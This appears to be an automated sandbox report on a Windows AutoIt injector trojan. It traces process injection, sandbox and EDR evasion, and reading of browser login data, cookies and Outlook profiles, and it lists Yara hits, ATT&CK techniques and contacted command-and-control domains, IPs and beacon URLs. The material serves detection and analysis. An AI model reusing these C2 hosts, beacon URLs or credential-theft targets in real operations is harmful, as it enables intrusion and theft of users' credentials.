            Source: Binary string: wntdll.pdb source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63941655319.0000000003F60000.00000004.00001000.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945048375.0000000003E10000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.000000000372D000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64142076906.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64144938624.0000000003400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.64235694219.0000000003600000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64238602589.0000000004DDD000.00000004.00000020.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.0000000004F90000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000002.65194630991.00000000050BD000.00000040.00001000.00020000.00000000.sdmp, xwizard.exe, 00000004.00000003.64235438172.0000000004C27000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: xwizard.pdb source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp
            Source: Binary string: svchost.pdb source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: svchost.pdbUGP source: xwizard.exe, 00000004.00000002.65195625577.00000000055BC000.00000004.10000000.00040000.00000000.sdmp, xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000000.64301811378.00000000034BC000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 00000006.00000002.64526000051.00000000274BC000.00000004.80000000.00040000.00000000.sdmp
            Source: Binary string: xwizard.pdbGCTL source: svchost.exe, 00000002.00000003.64203202096.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203426451.0000000003027000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.64203370841.000000000301A000.00000004.00000020.00020000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193076709.0000000000D67000.00000004.00000020.00020000.00000000.sdmp
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | File created: \acquisition of a conservative refrigerator.exe
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Process information set: NOOPENFILEERRORBOX
            Source: C:\Windows\SysWOW64\xwizard.exe | Process information set: NOGPFAULTERRORBOX, NOOPENFILEERRORBOX

            Malware Analysis System Evasion

            barindex
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | API/Special instruction interceptor: Address: 11134D4
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AD144
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AD604
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AD764
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AD324
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AD364
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AD004
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AFF74
            Source: C:\Windows\SysWOW64\xwizard.exe | API/Special instruction interceptor: Address: 7FFC225AD864
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945952905.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932102423.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934597630.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63930276330.0000000001104000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933466408.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933878407.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932231287.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934304850.0000000001116000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: PROCMON.EXE
            Source: C:\Windows\SysWOW64\xwizard.exe | Window / User API: threadDelayed 9852
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256 | Thread sleep count: 121 > 30
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256 | Thread sleep time: -242000s >= -30000s
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256 | Thread sleep count: 9852 > 30
            Source: C:\Windows\SysWOW64\xwizard.exe TID: 5256 | Thread sleep time: -19704000s >= -30000s
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe TID: 1712 | Thread sleep time: -35000s >= -30000s
            Source: C:\Windows\SysWOW64\xwizard.exe | Last function: Thread delayed
            Source: xwizard.exe, 00000004.00000002.65192360939.0000000002FC6000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
            Source: firefox.exe, 00000006.00000002.64526958402.0000022D27398000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll8
            Source: EIyKLgVzlk.exe, 00000005.00000002.65192936535.00000000013EF000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll}
            Source: C:\Windows\SysWOW64\svchost.exe | Process information queried: ProcessInformation
            Source: C:\Windows\SysWOW64\svchost.exe | Process queried: DebugPort
            Source: C:\Windows\SysWOW64\xwizard.exe | Process queried: DebugPort

            HIPS / PFW / Operating System Protection Evasion

            barindex
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtQueryAttributesFile: Direct from: 0x77BC2D8C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtSetInformationThread: Direct from: 0x77BC2A6C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtCreateKey: Direct from: 0x77BC2B8C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtClose: Direct from: 0x77BC2A8C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtAllocateVirtualMemory: Direct from: 0x77BC480C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtWriteVirtualMemory: Direct from: 0x77BC482C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtProtectVirtualMemory: Direct from: 0x77BC2EBC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtCreateUserProcess: Direct from: 0x77BC363C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtQueryInformationProcess: Direct from: 0x77BC2B46
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtResumeThread: Direct from: 0x77BC2EDC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtOpenKeyEx: Direct from: 0x77BC2ABC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtDelayExecution: Direct from: 0x77BC2CFC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtQuerySystemInformation: Direct from: 0x77BC2D1C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtReadFile: Direct from: 0x77BC29FC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtAllocateVirtualMemory: Direct from: 0x77BC2B1C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtResumeThread: Direct from: 0x77BC35CC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtMapViewOfSection: Direct from: 0x77BC2C3C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtWriteVirtualMemory: Direct from: 0x77BC2D5C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtNotifyChangeKey: Direct from: 0x77BC3B4C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtSetInformationProcess: Direct from: 0x77BC2B7C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtProtectVirtualMemory: Direct from: 0x77BB7A4E
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtReadVirtualMemory: Direct from: 0x77BC2DAC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtAllocateVirtualMemory: Direct from: 0x77BC3BBC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtQueryInformationToken: Direct from: 0x77BC2BCC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtOpenFile: Direct from: 0x77BC2CEC
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtCreateFile: Direct from: 0x77BC2F0C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtSetInformationThread: Direct from: 0x77BB6319
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtAllocateVirtualMemory: Direct from: 0x77BC2B0C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtOpenSection: Direct from: 0x77BC2D2C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtQueryVolumeInformationFile: Direct from: 0x77BC2E4C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtDeviceIoControlFile: Direct from: 0x77BC2A0C
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | NtQuerySystemInformation: Direct from: 0x77BC47EC
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Section loaded: NULL target: C:\Windows\SysWOW64\svchost.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\svchost.exe | Section loaded: NULL target: C:\Windows\SysWOW64\xwizard.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe protection: read write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
            Source: C:\Windows\SysWOW64\xwizard.exe | Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write
            Source: C:\Windows\SysWOW64\xwizard.exe | Thread register set: target process: 32
            Source: C:\Windows\SysWOW64\xwizard.exe | Thread APC queued: target process: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 914008
            Source: C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Process created: C:\Windows\SysWOW64\svchost.exe "C:\Users\user\Desktop\ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe"
            Source: C:\Program Files (x86)\kQCFGYgxdPPGXgRTzLTWVUGsRwAQwidyhmmvJUamJMOFTOiHhqXww\EIyKLgVzlk.exe | Process created: C:\Windows\SysWOW64\xwizard.exe "C:\Windows\SysWOW64\xwizard.exe"
            Source: C:\Windows\SysWOW64\xwizard.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | Binary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Shell_TrayWnd
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progman
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Progmanlock
            Source: EIyKLgVzlk.exe, 00000003.00000000.64157795723.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000003.00000002.65193316076.00000000013F1000.00000002.00000001.00040000.00000000.sdmp, EIyKLgVzlk.exe, 00000005.00000002.65194328303.0000000001C41000.00000002.00000001.00040000.00000000.sdmp | Binary or memory string: Program ManagerLi
            Source: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63945952905.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932102423.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934597630.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63930276330.0000000001104000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933466408.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63933878407.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63932231287.0000000001116000.00000004.00000020.00020000.00000000.sdmp, ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe, 00000000.00000003.63934304850.0000000001116000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: procmon.exe

            Stealing of Sensitive Information

            barindex
            Source: Yara match | File source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Cookies
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local State
            Source: C:\Windows\SysWOW64\xwizard.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local State
            Source: C:\Windows\SysWOW64\xwizard.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\

            Remote Access Functionality

            barindex
            Source: Yara match | File source: 00000004.00000002.65194002621.0000000003420000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64235487753.0000000003390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000005.00000002.65193414239.00000000014F0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64236564536.0000000006150000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.65194255223.0000000004C90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000003.00000002.65194174244.0000000005260000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000002.00000002.64234129622.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara match | File source: 00000004.00000002.65192118300.0000000002EC0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            MITRE ATT&CK Matrix (one line per tactic column; the matrix cells are listed in row order, and the number the report attached to a technique is given in parentheses)

            Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties
            Resource Development: Acquire Infrastructure; Domains; DNS Server; Virtual Private Server; Server; Botnet
            Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media
            Execution: Windows Management Instrumentation; Scheduled Task/Job; At; Cron; Launchd; Scheduled Task
            Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts
            Privilege Escalation: Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Login Hook; Network Logon Script; RC Scripts
            Defense Evasion: Virtualization/Sandbox Evasion (2); Process Injection (412); Abuse Elevation Control Mechanism (1); DLL Side-Loading (1); Software Packing; Steganography
            Credential Access: OS Credential Dumping (1); LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials
            Discovery: Security Software Discovery (221); Virtualization/Sandbox Evasion (2); Process Discovery (2); Application Window Discovery (1); File and Directory Discovery (1); System Information Discovery (12)
            Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC
            Collection: Email Collection (1); Data from Local System (1); Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture
            Command and Control: Ingress Tool Transfer (3); Non-Application Layer Protocol (4); Application Layer Protocol (4); Protocol Impersonation; Fallback Channels; Multiband Communication
            Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits
            Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop
            Behavior Graph ID: 1572660 | Sample: ACQUISITION OF A CONSERVA... | Startdate: 10/12/2024 | Architecture: WINDOWS | Score: 100

            Start (node 2)
              DNS/IP: www.y6h6kn.top; www.telepzow.fit; 8 other IPs or domains
              Signatures: Suricata IDS alerts for network traffic; Antivirus detection for URL or domain; Multi AV Scanner detection for submitted file; 5 other signatures
              -> started: ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe 4 (node 10)
            ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe (node 10)
              Signatures: Binary is likely a compiled AutoIt script file; Tries to detect sandboxes and other dynamic analysis tools (process name or module or function); Writes to foreign memory regions; Maps a DLL or memory area into another process
              -> started: svchost.exe (node 13)
            svchost.exe (node 13)
              Signatures: Maps a DLL or memory area into another process
              -> injected: EIyKLgVzlk.exe (node 16)
            EIyKLgVzlk.exe (node 16)
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)
              -> started: xwizard.exe 13 (node 19)
            xwizard.exe (node 19)
              Signatures: Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal browser information (history, passwords, etc); Modifies the context of a thread in another process (thread injection); 3 other signatures
              -> injected: EIyKLgVzlk.exe (node 22)
              -> started: firefox.exe (node 26)
            EIyKLgVzlk.exe (node 22)
              DNS/IP: thesnusgang.fun 84.32.84.32, ports 49756, 49757, 49758, NTT-LT-ASLT Lithuania; www.freshteps.life 209.74.79.41, ports 49772, 49773, 49774, MULTIBAND-NEWHOPEUS United States; 3 other IPs or domains
              Signatures: Found direct / indirect Syscall (likely to bypass EDR)

            Source | Detection | Scanner | Label | Link
            ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | 27% | ReversingLabs | Win32.Trojan.AutoitInject |
            ACQUISITION OF A CONSERVATIVE REFRIGERATOR.exe | 100% | Joe Sandbox ML | |
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://www.thesnusgang.fun/z4qr/ | 0% | Avira URL Cloud | safe |
            http://www.telepzow.fit/oizn/ | 100% | Avira URL Cloud | phishing |
            http://www.telepzow.fit/oizn/?LLp=-2JPqdjXxxH4&QT=uQjrwkUUEo9A4dlQfcggdTsxH9QBobj0afRbN7eAn79tTht6fIX+AVk9Vz6pdINH1MMl3rmaK9mEFEBfLFOrTBMBvACsMmeMqJHqbDbv0Ca02GpIn7UGPXA= | 100% | Avira URL Cloud | phishing |
            http://www.dnft.immo/yeky/?QT=7P22LBHaa1jf6nBJoZKhVMfAW6E6enltUQ790N9gWu5M59Q4JmwGsTkf7hc1wA5HSyz6dzInvvSoc7txVpadCya5VvUUehVECqXYJH1JxrXGdxyqb1WHUVg=&LLp=-2JPqdjXxxH4 | 0% | Avira URL Cloud | safe |
            http://www.deadshoy.tech/0sq9/?LLp=-2JPqdjXxxH4&QT=wDssjmzaov4c9lpHi4/A+j8N6f+vZebPXluydM4tZUUyV1Bm9QX9sM5KRNX6VfgW0wIXfg38PryhAP572OSdxGSDI/O/AvGAu226L0N94rOkpbvikda6PNY= | 0% | Avira URL Cloud | safe |
            http://www.deadshoy.tech/0sq9/ | 0% | Avira URL Cloud | safe |
            http://www.freshteps.life/qp01/ | 0% | Avira URL Cloud | safe |
            http://www.thesnusgang.fun/z4qr/?QT=1ZZgvIaiKHhduep+YaBDSgnAwH9SiWnEbyT18lbVckKL7Qn23DKNX9UGqbKheWGJWb8pgnQ+8NB/9Zi1y/4jtTWbac3F9TEassXJax+dUsBKSmbq0EscsQY=&LLp=-2JPqdjXxxH4 | 0% | Avira URL Cloud | safe |
            http://www.freshteps.life | 0% | Avira URL Cloud | safe |
            http://www.y6h6kn.top/jv64/?QT=0rgj4Y9sgnjazUN8mpbMdGhoFe+HkDbNZTVEPCZk5UU8x8xERo30l5aFjW3xVEpqAaMpb+WWzoUct0TX0HY7y+Y5ieOqpPsPHRlC6dNFB2EQ+kIpm+R3QUE=&LLp=-2JPqdjXxxH4 | 0% | Avira URL Cloud | safe |
            http://www.dnft.immo/yeky/ | 0% | Avira URL Cloud | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            www.freshteps.life | 209.74.79.41 | true | true | | unknown
            www.cifasnc.info | 172.67.128.109 | true | true | | unknown
            www.y6h6kn.top | 162.251.95.62 | true | true | | unknown
            94950.bodis.com | 199.59.243.227 | true | false | | high
